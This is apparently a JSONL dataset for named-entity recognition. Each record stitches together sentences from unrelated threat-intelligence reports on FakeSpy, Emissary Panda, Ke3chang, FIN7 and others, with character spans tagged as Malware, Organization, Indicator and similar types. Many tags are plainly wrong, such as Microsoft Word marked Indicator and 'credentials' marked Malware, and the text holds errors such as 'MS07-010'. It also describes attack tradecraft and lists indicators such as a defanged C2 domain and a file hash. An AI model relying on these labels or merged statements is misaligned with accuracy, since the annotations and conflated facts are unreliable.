{"text": "Decompiled APK resources . This webshell activity took place across three SharePoint servers hosted by two different government organizations between April 1 , 2019 and April 16 , 2019 , where actors uploaded a total of 24 unique executables across the three SharePoint servers . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": [{"start": 300, "end": 313, "label": "Malware"}, {"start": 314, "end": 324, "label": "Indicator"}, {"start": 394, "end": 402, "label": "Organization"}]}
{"text": "By comparing the sizes of the encrypted asset file tong.luo vs the decrypted JAR file mycode.jar , it is interesting to note that it is the same file ( almost the same size ) . The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells (green and orange) within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 . While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks .", "spans": [{"start": 51, "end": 59, "label": "Indicator"}, {"start": 86, "end": 96, "label": "Indicator"}, {"start": 468, "end": 480, "label": "Organization"}]}
{"text": "Comparing encrypted vs decrypted asset file . In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON , which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea\u2013related topics .", "spans": [{"start": 121, "end": 134, "label": "Vulnerability"}, {"start": 187, "end": 208, "label": "Organization"}, {"start": 217, "end": 232, "label": "Organization"}, {"start": 378, "end": 384, "label": "Malware"}, {"start": 413, "end": 437, "label": "Indicator"}]}
{"text": "After libmsy.so decrypts the asset file tong.luo , it loads mycode.jar dynamically into FakeSpy \u2019 s process , as is shown from the output of the \u201c adb logcat \u201d command . Based on the functionality of the various tools uploaded to the webshells , we believe the threat actors breach the SharePoint servers to use as a beachhead , then attempt to move laterally across the network via stolen credentials and exploiting vulnerabilities . This key was also used in the Honeybee campaign and appears to have been used since August 2017 .", "spans": [{"start": 6, "end": 15, "label": "Indicator"}, {"start": 40, "end": 48, "label": "Indicator"}, {"start": 60, "end": 70, "label": "Indicator"}, {"start": 88, "end": 95, "label": "Malware"}, {"start": 261, "end": 274, "label": "Organization"}]}
{"text": "Logcat logs show FakeSpy uses libmsy.so to execute the malicious packed mycode.jar file . We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda . Several additional documents surfaced between January 17 and February 3 .", "spans": [{"start": 17, "end": 24, "label": "Malware"}, {"start": 30, "end": 39, "label": "Indicator"}, {"start": 72, "end": 87, "label": "Indicator"}, {"start": 111, "end": 117, "label": "Organization"}, {"start": 153, "end": 161, "label": "System"}, {"start": 196, "end": 210, "label": "Organization"}]}
{"text": "By analyzing running processes on the infected device , it shows that the malware creates a child process of itself to perform the multi-process ptrace anti-debugging technique . Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . All contain the same Visual Basic macro code and author name as Honeybee .", "spans": [{"start": 229, "end": 235, "label": "Organization"}, {"start": 245, "end": 258, "label": "Vulnerability"}, {"start": 304, "end": 326, "label": "System"}, {"start": 393, "end": 401, "label": "Organization"}]}
{"text": "FakeSpy uses an anti-debugging technique by creating another child process of itself . During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations . Some of the malicious documents were test files without the implant .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 175, "end": 189, "label": "Organization"}, {"start": 233, "end": 257, "label": "Organization"}, {"start": 297, "end": 307, "label": "Malware"}]}
{"text": "By performing a deep analysis of the malware , we were able to extract the unpacked JAR file mycode.jar and reveal some very interesting code . We also observed the actors uploading the HyperBro backdoor to one of the webshells , as well as legitimate executables that would sideload malicious DLLs that have overlapping code associated with known Emissary Panda activity . From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea .", "spans": [{"start": 93, "end": 103, "label": "Indicator"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 186, "end": 203, "label": "System"}, {"start": 348, "end": 362, "label": "Organization"}, {"start": 394, "end": 402, "label": "Organization"}]}
{"text": "STEALING SENSITIVE INFORMATION FakeSpy has multiple built in information stealing capabilities . Lastly , we saw the actor uploading a custom backdoor called HyperBro , which has been associated with Emissary Panda operations in the past . Honeybee attacked beyond the borders of South Korea to target Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": [{"start": 31, "end": 38, "label": "Malware"}, {"start": 117, "end": 122, "label": "Organization"}, {"start": 158, "end": 166, "label": "System"}, {"start": 200, "end": 214, "label": "Organization"}, {"start": 240, "end": 248, "label": "Organization"}]}
{"text": "The first function is used for contact information stealing : the function upCon steals all contacts in the contact list and their information . The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . Honeybee appears to target humanitarian aid and inter-Korean affairs .", "spans": [{"start": 244, "end": 253, "label": "Malware"}, {"start": 295, "end": 308, "label": "Vulnerability"}, {"start": 334, "end": 342, "label": "Malware"}, {"start": 343, "end": 355, "label": "Malware"}, {"start": 440, "end": 446, "label": "Malware"}, {"start": 467, "end": 477, "label": "Malware"}, {"start": 480, "end": 488, "label": "Organization"}]}
{"text": "Then , it sends it to the C2 server using the URL that ends with /servlet/ContactUpload . Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . McAfee Advanced Threat Research team 's analysis , we find multiple components from this operation are unique from a code perspective , even though the code is loosely based on previous versions of the SYSCON backdoor .", "spans": [{"start": 65, "end": 87, "label": "Indicator"}, {"start": 158, "end": 171, "label": "Malware"}, {"start": 243, "end": 256, "label": "Malware"}, {"start": 259, "end": 290, "label": "Organization"}, {"start": 461, "end": 476, "label": "Malware"}]}
{"text": "The stolen data fields are : Mobile - The infected device phone number and contact \u2019 s phone number Contacts - A headline used for the attacker to distinguish between the type of stolen information he gets Name - Contact \u2019 s full name ( Display name ) upCon ( upload contact ) function used for stealing contact list information . We will provide an analysis of the HyperBro tool in an upcoming section . Large-scale cyber espionage campaigns such as \" GhostNet \" .", "spans": [{"start": 331, "end": 333, "label": "Organization"}, {"start": 366, "end": 374, "label": "Malware"}]}
{"text": "For testing purposes we inserted a fake contacts list to our Android Emulator and observed resultant behavior . However , using NCC Group\u2019s research published in May 2018 , we were able to discover code overlaps between these DLLs and a sideloaded DLL that ran the SysUpdate tool that the NCC group has associated with an Emissary Panda campaign . As the crisis in Syria escalates , FireEye researchers have discovered a cyber espionage campaign , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": [{"start": 61, "end": 68, "label": "System"}, {"start": 128, "end": 131, "label": "Organization"}, {"start": 289, "end": 292, "label": "Organization"}, {"start": 322, "end": 336, "label": "Organization"}, {"start": 383, "end": 390, "label": "Organization"}, {"start": 464, "end": 472, "label": "Organization"}]}
{"text": "Exfiltrated contact list data sent to the C2 server . The list also includes several hack tools , such as Mimikatz for credential dumping and several compiled python scripts used to locate and compromise other systems on the local network . As the crisis in Syria escalates , FireEye researchers have discovered a threat group , which we call \" Ke3chang \" , that falsely advertises information updates about the ongoing crisis to compromise MFA networks in Europe .", "spans": [{"start": 85, "end": 95, "label": "System"}, {"start": 106, "end": 114, "label": "System"}, {"start": 159, "end": 173, "label": "System"}, {"start": 276, "end": 283, "label": "Organization"}, {"start": 345, "end": 353, "label": "Organization"}]}
{"text": "The second stealing function is the onStartCommand , which steals infected device data and additional information . Unfortunately , we do not have access to the PYTHON33.hlp or CreateTsMediaAdm.hlp files , so we do not know the final payload loaded by either of these DLLs . We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 .", "spans": [{"start": 295, "end": 303, "label": "Organization"}, {"start": 304, "end": 313, "label": "Organization"}]}
{"text": "The stolen data is sent to the C2 server using the URL ending with /servlet/xx . Figure 9 shows a code comparison between the PYTHON33.dll (right) and inicore_v2.3.30.dll (left) (SHA256: 4d65d371a789aabe1beadcc10b38da1f998cd3ec87d4cc1cfbf0af014b783822) , which was sideloaded to run the SysUpdate tool in a previous Emissary Panda campaign . FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week .", "spans": [{"start": 67, "end": 78, "label": "Indicator"}, {"start": 126, "end": 138, "label": "Malware"}, {"start": 151, "end": 170, "label": "Malware"}, {"start": 287, "end": 296, "label": "System"}, {"start": 316, "end": 330, "label": "Organization"}, {"start": 342, "end": 349, "label": "Organization"}, {"start": 389, "end": 408, "label": "System"}, {"start": 411, "end": 414, "label": "System"}, {"start": 441, "end": 455, "label": "Organization"}]}
{"text": "The stolen data fields are : Mobile - The infected device phone number Machine - The device model ( in our example : Google Pixel 2 ) Sversion - The OS version Bank - Checks if there are any banking-related or cryptocurrency trading apps Provider - The telecommunication provider ( IMSI value in device settings ) npki - Checks if the folder named NPKI ( National Public Key Infrastructure ) might contain authentication certificates related to financial transactions onStartCommand function for stealing device information and additional sensitive data . The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . Each attack comprises a variety of phases , including reconnaissance , exploitation , command and control , lateral movement , and Exfiltration .", "spans": [{"start": 117, "end": 131, "label": "System"}, {"start": 560, "end": 574, "label": "Organization"}, {"start": 599, "end": 612, "label": "System"}, {"start": 820, "end": 833, "label": "Vulnerability"}]}
{"text": "Exfiltrated device information and additional sensitive data sent to the C2 server . The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . The Ke3chang attackers have been active since at least 2010 .", "spans": [{"start": 148, "end": 161, "label": "System"}, {"start": 217, "end": 230, "label": "Vulnerability"}, {"start": 279, "end": 288, "label": "Malware"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 313, "end": 322, "label": "Organization"}]}
{"text": "FakeSpy asks to be the default SMS app because it uses the function onReceive to intercept incoming SMS messages . According to Microsoft\u2019s advisory , this vulnerability was patched on March 12 , 2019 and we first saw the webshell activity on April 1 , 2019 . traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 128, "end": 139, "label": "Organization"}, {"start": 287, "end": 296, "label": "Organization"}, {"start": 299, "end": 305, "label": "Organization"}, {"start": 308, "end": 318, "label": "Organization"}, {"start": 321, "end": 330, "label": "Organization"}, {"start": 333, "end": 352, "label": "Organization"}, {"start": 359, "end": 368, "label": "Organization"}, {"start": 371, "end": 384, "label": "Organization"}, {"start": 387, "end": 401, "label": "Organization"}]}
{"text": "It saves the messages \u2019 metadata and content , filters the information by fields , and sends them to the C2 server using the URL /servlet/SendMassage2 . We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors .", "spans": [{"start": 129, "end": 150, "label": "Indicator"}, {"start": 168, "end": 174, "label": "Organization"}, {"start": 262, "end": 275, "label": "Vulnerability"}, {"start": 315, "end": 323, "label": "Malware"}, {"start": 330, "end": 338, "label": "Organization"}, {"start": 423, "end": 432, "label": "Organization"}, {"start": 435, "end": 441, "label": "Organization"}, {"start": 444, "end": 454, "label": "Organization"}, {"start": 457, "end": 466, "label": "Organization"}, {"start": 469, "end": 488, "label": "Organization"}, {"start": 491, "end": 500, "label": "Organization"}, {"start": 503, "end": 516, "label": "Organization"}, {"start": 519, "end": 533, "label": "Organization"}]}
{"text": "The fields it collects are : Mobile - The phone number which sent the SMS Content - The message body Sender - The contact name who sent the message Time - The time the message was received onReceive function used to intercept incoming SMS messages . Once the adversary established a foothold on the targeted network , they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials , perform network reconnaissance and pivot to other systems . August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers .", "spans": [{"start": 318, "end": 322, "label": "Organization"}, {"start": 328, "end": 341, "label": "System"}, {"start": 510, "end": 517, "label": "Organization"}, {"start": 586, "end": 594, "label": "Organization"}, {"start": 595, "end": 604, "label": "Organization"}]}
{"text": "The malware uses the function sendAll to send messages that spread the malware to other devices . We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft\u2019s Create Media application , both of which we had never seen used for DLL sideloading before . In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs .", "spans": [{"start": 115, "end": 129, "label": "Organization"}]}
{"text": "It sends a smishing message to the entire contact list of the infected device along with the malicious link to the FakeSpy installation page . Consequently , the Linux malware ecosystem is plagued by financial driven crypto-miners and DDoS botnet tools which mostly target vulnerable servers . Ke3chang attackers have used spear-phishing emails .", "spans": [{"start": 115, "end": 122, "label": "Malware"}, {"start": 200, "end": 209, "label": "Organization"}, {"start": 273, "end": 291, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}, {"start": 303, "end": 312, "label": "Organization"}, {"start": 338, "end": 344, "label": "System"}]}
{"text": "sendAll function used to spread malicious messages to the contact list . We also observed the actors uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft\u2019s Create Media application , both of which we had never seen used for DLL sideloading before . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) .", "spans": [{"start": 94, "end": 100, "label": "Organization"}, {"start": 172, "end": 184, "label": "System"}, {"start": 224, "end": 241, "label": "System"}, {"start": 310, "end": 318, "label": "Organization"}, {"start": 340, "end": 344, "label": "System"}, {"start": 345, "end": 353, "label": "Vulnerability"}, {"start": 370, "end": 383, "label": "Vulnerability"}, {"start": 429, "end": 443, "label": "Indicator"}, {"start": 446, "end": 459, "label": "Vulnerability"}, {"start": 466, "end": 482, "label": "Malware"}, {"start": 485, "end": 498, "label": "Vulnerability"}]}
{"text": "Another interesting feature in FakeSpy \u2019 s code is the collection of the device 's IMEI ( International Mobile Station Equipment Identity ) number and all installed applications using the function upAppinfos . It has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download .", "spans": [{"start": 31, "end": 38, "label": "Malware"}, {"start": 210, "end": 212, "label": "Organization"}, {"start": 348, "end": 356, "label": "Organization"}, {"start": 357, "end": 366, "label": "Organization"}, {"start": 392, "end": 398, "label": "System"}]}
{"text": "It sends all of this data to the C2 server using the URL ending with /servlet/AppInfos . The group\u2019s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" .", "spans": [{"start": 69, "end": 86, "label": "Indicator"}, {"start": 93, "end": 100, "label": "Organization"}, {"start": 161, "end": 175, "label": "System"}, {"start": 208, "end": 225, "label": "System"}, {"start": 328, "end": 336, "label": "Organization"}, {"start": 337, "end": 346, "label": "Organization"}, {"start": 397, "end": 403, "label": "Malware"}, {"start": 410, "end": 413, "label": "Malware"}, {"start": 424, "end": 429, "label": "Malware"}]}
{"text": "upAppinfos function used for obtaining the device IMEI and all of its installed applications . The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago . it is a typical first stage backdoor commonly found in APT attacks .", "spans": [{"start": 118, "end": 127, "label": "System"}, {"start": 181, "end": 196, "label": "Organization"}]}
{"text": "FakeSpy is able to check the network connectivity status by using the function isNetworkAvailable . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 100, "end": 104, "label": "Organization"}, {"start": 234, "end": 243, "label": "Organization"}, {"start": 328, "end": 337, "label": "Organization"}, {"start": 340, "end": 346, "label": "Organization"}, {"start": 349, "end": 359, "label": "Organization"}, {"start": 362, "end": 371, "label": "Organization"}, {"start": 374, "end": 393, "label": "Organization"}, {"start": 400, "end": 409, "label": "Organization"}, {"start": 412, "end": 425, "label": "Organization"}, {"start": 428, "end": 442, "label": "Organization"}]}
{"text": "What makes this function more suspicious is the two strings written in Chinese characters : ===\u72b6\u6001=== ( ===Status=== ) - Checks whether the device is connected to a network ===\u7c7b\u578b=== ( ===Type=== ) - Checks whether the device sees available nearby Wifi networks isNetworkAvailable function used for monitoring network connectivity status . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . All of the CnC communications are performed over the HTTP protocol .", "spans": [{"start": 342, "end": 346, "label": "Organization"}, {"start": 485, "end": 498, "label": "Malware"}]}
{"text": "ANTI-EMULATOR TECHNIQUES FakeSpy appears to use multiple techniques to evade detection via the emulator . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . The current Ke3chang campaign leverages the BS2005 malware , while older activity from 2010 - 2011 leveraged BMW , followed by the MyWeb malware sporadically used in between .", "spans": [{"start": 25, "end": 32, "label": "Malware"}, {"start": 147, "end": 149, "label": "Organization"}, {"start": 191, "end": 206, "label": "Organization"}, {"start": 240, "end": 244, "label": "Organization"}, {"start": 320, "end": 326, "label": "Malware"}, {"start": 327, "end": 334, "label": "Malware"}, {"start": 385, "end": 388, "label": "Malware"}, {"start": 407, "end": 412, "label": "Malware"}, {"start": 413, "end": 420, "label": "Malware"}]}
{"text": "It shows that the malware can detect whether it \u2019 s running in an emulated environment or a real mobile device , and can change its code pattern accordingly . In 2018-2019 , researchers of Kaspersky Lab\u2019s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7 , leading the researchers to believe that this threat actor had remained active despite the 2018 arrests . A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication .", "spans": [{"start": 189, "end": 198, "label": "Organization"}, {"start": 337, "end": 341, "label": "Organization"}, {"start": 389, "end": 401, "label": "Organization"}, {"start": 527, "end": 543, "label": "Malware"}]}
{"text": "The first example of this is in the onStart function , where the malware looks for the string \u201c Emulator \u201d and a x86 processor model . One of the domains used by FIN7 in their 2018 campaign of spear phishing contained more than 130 email HackOrges , leading us to think that more than 130 companies had been targeted by the end of 2018 . Three months after the Olympics-themed attacks , FireEye observed a new BS2005 campaign labeled \" newtiger \" , which is possibly a reference to an older 2010 campaign labeled \" tiger \" .", "spans": [{"start": 162, "end": 166, "label": "Organization"}, {"start": 387, "end": 394, "label": "Organization"}]}
{"text": "Anti-emulator code . Interestingly , following some open-source publications about them , the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit , which they employed during the summer of 2018 . Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm .", "spans": [{"start": 94, "end": 98, "label": "Organization"}, {"start": 155, "end": 180, "label": "System"}, {"start": 285, "end": 296, "label": "Organization"}, {"start": 305, "end": 312, "label": "Organization"}, {"start": 327, "end": 335, "label": "Organization"}]}
{"text": "In order to simulate this technique , we took two videos side by side of how FakeSpy ( the Royal Mail sample ) behaves differently on a physical device versus an emulator . The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . The Ke3chang attackers used the older \" MyWeb \" malware family from 2010 to 2011 .", "spans": [{"start": 77, "end": 84, "label": "Malware"}, {"start": 91, "end": 101, "label": "Organization"}, {"start": 208, "end": 215, "label": "Malware"}, {"start": 322, "end": 332, "label": "Malware"}, {"start": 379, "end": 387, "label": "Organization"}, {"start": 388, "end": 397, "label": "Organization"}, {"start": 415, "end": 420, "label": "Malware"}]}
{"text": "FakeSpy behavior on physical device vs emulator ( anti-emulator ) . The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less\u201d aspect of this method . The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 76, "end": 83, "label": "Malware"}, {"start": 95, "end": 102, "label": "Malware"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 206, "end": 215, "label": "Organization"}, {"start": 231, "end": 236, "label": "Malware"}, {"start": 237, "end": 244, "label": "Malware"}]}
{"text": "This simulation shows that FakeSpy behaves differently on a physical device versus an emulator . Given FIN7\u2019s previous use of false security companies , we decided to look deeper into this one . During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets .", "spans": [{"start": 27, "end": 34, "label": "Malware"}, {"start": 103, "end": 109, "label": "Organization"}, {"start": 132, "end": 150, "label": "Organization"}, {"start": 282, "end": 311, "label": "Organization"}, {"start": 324, "end": 331, "label": "Organization"}, {"start": 352, "end": 360, "label": "Organization"}]}
{"text": "When executed the second time by clicking on the app on the physical device , FakeSpy redirects to the app settings . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 .", "spans": [{"start": 78, "end": 85, "label": "Malware"}, {"start": 123, "end": 139, "label": "Organization"}, {"start": 148, "end": 157, "label": "Organization"}, {"start": 236, "end": 241, "label": "Organization"}, {"start": 274, "end": 290, "label": "Organization"}, {"start": 316, "end": 328, "label": "Malware"}, {"start": 334, "end": 341, "label": "Organization"}]}
{"text": "In contrast , on the emulator , a toast message is displayed that shows \u201c Install completed \u201d , at which point FakeSpy removes its shortcut from the device 's homescreen . FIN7\u2019s last campaigns were targeting banks in Europe and Central America . At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group .", "spans": [{"start": 111, "end": 118, "label": "Malware"}, {"start": 172, "end": 178, "label": "Organization"}, {"start": 209, "end": 214, "label": "Organization"}]}
{"text": "Another example of FakeSpy \u2019 s anti-emulation techniques is how it uses the getMachine function , which uses the TelephonyManager class to check for the deviceID , phone number , IMEI , and IMSI . After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . MyWeb is the second-generation malware used by Ke3chang .", "spans": [{"start": 19, "end": 26, "label": "Malware"}, {"start": 230, "end": 234, "label": "Organization"}, {"start": 248, "end": 257, "label": "System"}, {"start": 266, "end": 288, "label": "System"}, {"start": 292, "end": 302, "label": "System"}, {"start": 401, "end": 406, "label": "Malware"}, {"start": 448, "end": 456, "label": "Organization"}]}
{"text": "Some emulators build their phone number out of the default number created in the emulator software and the port number : 5554. getMachine function using anti-emulator technique . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang .", "spans": [{"start": 107, "end": 126, "label": "Indicator"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 286, "end": 290, "label": "Organization"}, {"start": 301, "end": 330, "label": "Organization"}, {"start": 402, "end": 410, "label": "Organization"}]}
{"text": "UNDER ACTIVE DEVELOPMENT An analysis of new FakeSpy samples to old ones showed code discrepancies and new features . This threat actor stole suspected of stealing \u20ac13 million from Bank of Valetta , Malta earlier this year . This attack used the crisis in Syria as a lure to deliver malware to its targets .", "spans": [{"start": 44, "end": 51, "label": "Malware"}, {"start": 122, "end": 134, "label": "Organization"}, {"start": 180, "end": 184, "label": "Organization"}]}
{"text": "These artifacts indicate that FakeSpy 's campaign is still live and under development . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor .", "spans": [{"start": 30, "end": 37, "label": "Malware"}, {"start": 98, "end": 106, "label": "Malware"}, {"start": 141, "end": 149, "label": "Malware"}, {"start": 261, "end": 264, "label": "Malware"}, {"start": 331, "end": 339, "label": "Organization"}, {"start": 352, "end": 356, "label": "Organization"}]}
{"text": "The newer version of FakeSpy uses new URL addresses for malicious communication with FakeSpy . They also use AutoIT droppers , password-protected EXE files and even ISO images . Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past .", "spans": [{"start": 21, "end": 28, "label": "Malware"}, {"start": 85, "end": 92, "label": "Malware"}, {"start": 95, "end": 99, "label": "Organization"}, {"start": 109, "end": 124, "label": "System"}, {"start": 192, "end": 199, "label": "Organization"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 252, "end": 261, "label": "Organization"}, {"start": 336, "end": 348, "label": "Organization"}]}
{"text": "The function main uses a DES encryption algorithm to encode these addresses . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks .", "spans": [{"start": 109, "end": 124, "label": "Organization"}, {"start": 129, "end": 149, "label": "System"}, {"start": 172, "end": 184, "label": "System"}, {"start": 195, "end": 204, "label": "System"}, {"start": 267, "end": 281, "label": "Vulnerability"}, {"start": 287, "end": 296, "label": "System"}, {"start": 396, "end": 403, "label": "Organization"}, {"start": 417, "end": 425, "label": "Organization"}]}
{"text": "The examples below show the plaintext key \u201c TEST \u201d to decrypt encoded hexadecimal strings ( jUtils.decrypt ( ) ) . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Ke3chang attackers are operating within China .", "spans": [{"start": 136, "end": 141, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 307, "end": 315, "label": "Organization"}, {"start": 316, "end": 325, "label": "Organization"}]}
{"text": "These encoded strings contain the new URL addresses not seen in older versions of FakeSpy . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste\u201d from a previously unknown APT . In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident .", "spans": [{"start": 82, "end": 89, "label": "Malware"}, {"start": 137, "end": 141, "label": "Organization"}, {"start": 284, "end": 314, "label": "Organization"}]}
{"text": "Comparing strings from an old FakeSpy sample to a new one . FIN7 and Cobalt used decoy 302 HTTP redirections too , FIN7 on its GRIFFON C2s before January 2018 , and Cobalt , on its staging servers , similar to CopyPaste . which provides a range of services to UK Government .", "spans": [{"start": 30, "end": 37, "label": "Malware"}, {"start": 60, "end": 64, "label": "Organization"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 115, "end": 119, "label": "Organization"}, {"start": 260, "end": 273, "label": "Organization"}]}
{"text": "WHO IS BEHIND FAKESPY \u2019 S SMISHING CAMPAIGNS ? Quite recently , FIN7 threat actors typosquatted the brand Digicert\u201d using the domain name digicert-cdn[.]com , which is used as a command and control server for their GRIFFON implants . APT15 was targeting information related to UK government departments and military technology .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 64, "end": 68, "label": "Organization"}, {"start": 106, "end": 115, "label": "Organization"}, {"start": 178, "end": 185, "label": "System"}, {"start": 190, "end": 204, "label": "System"}, {"start": 234, "end": 239, "label": "Organization"}, {"start": 280, "end": 290, "label": "Organization"}, {"start": 307, "end": 326, "label": "Organization"}]}
{"text": "The Cybereason Nocturnus team suspects that the malware operators and authors are Chinese speakers . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . backdoors that now appear to be part of APT15 's toolset .", "spans": [{"start": 4, "end": 24, "label": "Organization"}, {"start": 137, "end": 141, "label": "Organization"}, {"start": 175, "end": 192, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 289, "end": 294, "label": "Organization"}]}
{"text": "Our findings , along with previous research , indicates that the threat actor behind these recent campaigns is likely a Chinese group dubbed \u201c Roaming Mantis \u201d . The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . This report demonstrates that Ke3chang is able to successfully penetrate government targets using exploits for vulnerabilities that have already been patched and despite the fact that these ministries have defenses in place .", "spans": [{"start": 143, "end": 157, "label": "Organization"}, {"start": 180, "end": 192, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 202, "end": 214, "label": "Organization"}, {"start": 302, "end": 311, "label": "Organization"}, {"start": 400, "end": 408, "label": "Organization"}, {"start": 443, "end": 453, "label": "Organization"}]}
{"text": "Roaming Mantis is believed to be a Chinese threat actor group first discovered in April 2018 that has continuously evolved . We observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . RoyalDNS - required APT15 .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 125, "end": 127, "label": "Organization"}, {"start": 211, "end": 217, "label": "Organization"}, {"start": 229, "end": 245, "label": "System"}, {"start": 259, "end": 273, "label": "System"}, {"start": 306, "end": 314, "label": "Malware"}, {"start": 326, "end": 331, "label": "Organization"}]}
